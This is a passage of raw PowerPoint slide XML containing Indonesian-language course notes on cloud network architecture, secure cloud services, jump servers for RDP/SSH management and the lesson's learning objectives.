              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RDP dan SSH. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkonsolidasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222739117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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optimalisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. Fitur-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastisitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyesuaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-tenancy dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi hybrid dan multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet of Things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meninjau</a:t>
            </a:r>
            <a:r>
